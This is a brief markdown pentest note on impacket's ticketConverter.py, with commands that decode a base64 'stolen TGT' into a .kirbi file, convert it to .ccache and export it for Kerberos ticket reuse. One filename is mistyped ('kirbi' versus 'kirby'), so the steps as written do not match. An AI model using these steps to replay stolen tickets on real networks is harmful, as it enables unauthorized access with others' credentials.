# ticketConverter.py
This is part of [impacket](https://github.com/fortra/impacket) and awesome for manipulating Kerberos tickets.

## Convert a stolen TGT into a .ccache

```
notepad ticky.txt
[paste it in!]
base64 -d ticky.txt > ticky.kirbi
ticketConverter.py ticky.kirby ticky.ccache
export KRB5CCNAME=ticky.ccache
```
